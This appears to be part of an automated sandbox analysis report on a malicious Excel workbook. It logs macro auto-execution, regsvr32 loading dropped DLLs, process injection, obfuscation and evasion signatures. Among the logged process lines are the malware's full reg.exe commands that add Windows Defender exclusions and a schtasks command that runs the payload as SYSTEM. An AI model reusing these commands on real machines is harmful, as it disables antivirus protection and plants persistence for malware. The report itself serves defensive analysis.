Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D8242A 8_2_00D8242A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D81424 8_2_00D81424
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D83726 8_2_00D83726
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D834DA 8_2_00D834DA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D81C5D 8_2_00D81C5D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D83073 8_2_00D83073
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D832EB 8_2_00D832EB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D84162 8_2_00D84162
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D8B114 8_2_00D8B114
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D84495 8_2_00D84495
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D81D89 8_2_00D81D89
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D81000 8_2_00D81000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_00D81827 8_2_00D81827
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_10016EB0 8_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_10012346 8_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_10011758 8_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_10014FC0 8_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_00096EB0 10_2_00096EB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_00092346 10_2_00092346
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_00091758 10_2_00091758
Source: C:\Windows\SysWOW64\explorer.exe Code function: 10_2_00094FC0 10_2_00094FC0
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Compensation-1730406737-09272021.xls OLE, VBA macro line: Sub auto_open()
Source: Compensation-1730406737-09272021.xls OLE, VBA macro line: Sub auto_close()
Source: Compensation-1730406737-09272021.xls OLE, VBA macro line: Private m_openAlreadyRan As Boolean
Source: Compensation-1730406737-09272021.xls OLE, VBA macro line: Private Sub saWorkbook_Opensa()
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 4_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 4_2_1000CB77
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 8_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 8_2_1000CB77
PE file does not import any functions
Source: Drezd.red.5.dr Static PE information: No import functions for PE file found
Source: Drezd1.red.10.dr Static PE information: No import functions for PE file found
Source: Drezd2.red.17.dr Static PE information: No import functions for PE file found
Source: Drezd.red.15.dr Static PE information: No import functions for PE file found
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0'
Document contains embedded VBA macros
Source: Compensation-1730406737-09272021.xls OLE indicator, VBA macros: true
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ....................D.-..........&W.....(.P.............................U.................................................................-..... Jump to behavior
Source: C:\Windows\System32\reg.exe Console Write: ................$...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(............... Jump to behavior
Source: C:\Windows\System32\reg.exe Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(............... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Benqxuam' /d '0'
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0' Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Benqxuam' /d '0' Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Application Data\Microsoft\Forms Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD087.tmp Jump to behavior
Source: classification engine Classification label: mal100.expl.evad.winXLS@33/12@0/3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket, 4_2_1000D523
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: Compensation-1730406737-09272021.xls OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle, 4_2_1000ABA3
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{BB664AD5-33F0-401E-9904-CDFCDB509CFF}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{8402844E-5395-47D4-81FA-4A2D74AF4E12}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\Global\{0D1414CC-BF73-45B0-83AD-1EA17EEB389B}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{8402844E-5395-47D4-81FA-4A2D74AF4E12}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{0D1414CC-BF73-45B0-83AD-1EA17EEB389B}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{BB664AD5-33F0-401E-9904-CDFCDB509CFF}
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: amstream.pdb source: explorer.exe, 00000005.00000003.422309790.00000000027B1000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833726 push 00000000h; mov dword ptr [esp], ebp 4_2_0283376E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833726 push 00000000h; mov dword ptr [esp], edx 4_2_02833A0E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833726 push 00000000h; mov dword ptr [esp], esi 4_2_02833B55
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833726 push esi; mov dword ptr [esp], 00000001h 4_2_02833D71
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833726 push 00000000h; mov dword ptr [esp], ecx 4_2_02833D9C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833726 push 00000000h; mov dword ptr [esp], ebp 4_2_02833E46
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833726 push 00000000h; mov dword ptr [esp], esi 4_2_02833E72
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833726 push 00000000h; mov dword ptr [esp], esi 4_2_02833F52
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02833726 push 00000000h; mov dword ptr [esp], ebp 4_2_02833F76
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831424 push 00000000h; mov dword ptr [esp], ecx 4_2_02831460
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831424 push 00000000h; mov dword ptr [esp], ecx 4_2_0283159D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0283242A push 00000000h; mov dword ptr [esp], esi 4_2_0283276D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0283242A push 00000000h; mov dword ptr [esp], edi 4_2_0283288F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0283242A push 00000000h; mov dword ptr [esp], ebx 4_2_028328C3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_0283242A push 00000000h; mov dword ptr [esp], edi 4_2_02832B65
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02832C41 push 00000000h; mov dword ptr [esp], esi 4_2_02832D71
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02832C41 push 00000000h; mov dword ptr [esp], esi 4_2_02832E73
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02832C41 push 00000000h; mov dword ptr [esp], esi 4_2_0283336F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02832C41 push 00000000h; mov dword ptr [esp], ebp 4_2_028333F4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02832C41 push edi; mov dword ptr [esp], 00000004h 4_2_0283340B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02832C41 push 00000000h; mov dword ptr [esp], edx 4_2_0283346C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831000 push 00000000h; mov dword ptr [esp], ecx 4_2_028310E5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831000 push 00000000h; mov dword ptr [esp], edx 4_2_0283112A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831000 push 00000000h; mov dword ptr [esp], ecx 4_2_0283127C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831000 push edx; mov dword ptr [esp], 000FFFFFh 4_2_0283133C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831000 push 00000000h; mov dword ptr [esp], esi 4_2_02831356
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831D89 push 00000000h; mov dword ptr [esp], ebp 4_2_02831DAF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831D89 push 00000000h; mov dword ptr [esp], ebp 4_2_02831F4B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831D89 push 00000000h; mov dword ptr [esp], ebp 4_2_0283223C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831D89 push 00000000h; mov dword ptr [esp], ebx 4_2_028323A2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02831D89 push 00000000h; mov dword ptr [esp], ebp 4_2_02832400
PE file contains sections with non-standard names
Source: 44466.7022844907[1].dat.0.dr Static PE information: section name: .rdatat
Source: 44466.7022844907[1].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[1].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[1].dat.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name: .rdatat
Source: Drezd.red.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name:
Source: Drezd.red.0.dr Static PE information: section name:
Source: 44466.7022844907[2].dat.0.dr Static PE information: section name: .rdatat
Source: 44466.7022844907[2].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[2].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[2].dat.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name: .rdatat
Source: Drezd1.red.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name:
Source: Drezd1.red.0.dr Static PE information: section name:
Source: 44466.7022844907[3].dat.0.dr Static PE information: section name: .rdatat
Source: 44466.7022844907[3].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[3].dat.0.dr Static PE information: section name:
Source: 44466.7022844907[3].dat.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name: .rdatat
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd2.red.0.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name: .rdatat
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd.red.5.dr Static PE information: section name:
Source: Drezd1.red.10.dr Static PE information: section name: .rdatat
Source: Drezd1.red.10.dr Static PE information: section name:
Source: Drezd1.red.10.dr Static PE information: section name:
Source: Drezd1.red.10.dr Static PE information: section name:
Source: Drezd.red.15.dr Static PE information: section name: .rdatat
Source: Drezd.red.15.dr Static PE information: section name:
Source: Drezd.red.15.dr Static PE information: section name:
Source: Drezd.red.15.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name: .rdatat
Source: Drezd2.red.17.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name:
Source: Drezd2.red.17.dr Static PE information: section name:
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_1000DFAD LoadLibraryA,GetProcAddress, 4_2_1000DFAD

Persistence and Installation Behavior:

barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe Jump to behavior
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd1.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd2.red
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd1.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd2.red Jump to dropped file
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[3].dat Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd1.red Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[1].dat Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd2.red Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7022844907[2].dat Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd1.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd2.red Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd1.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd.red Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Drezd2.red Jump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05

Hooking and other Techniques for Hiding and Protection:

barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2008 base: AE102D value: E9 BA 4C 5A FF Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2608 base: AE102D value: E9 BA 4C 5A FF Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2540 base: AE102D value: E9 BA 4C 5A FF Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 408 base: AE102D value: E9 BA 4C 5A FF Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2920 Thread sleep count: 48 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2216 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520 Thread sleep count: 52 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2648 Thread sleep count: 72 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2932 Thread sleep count: 56 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2596 Thread sleep count: 53 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2636 Thread sleep count: 45 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2636 Thread sleep time: -104000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 788 Thread sleep count: 73 > 30 Jump to behavior
Found evasive API chain (date check)
Source: C:\Windows\SysWOW64\explorer.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
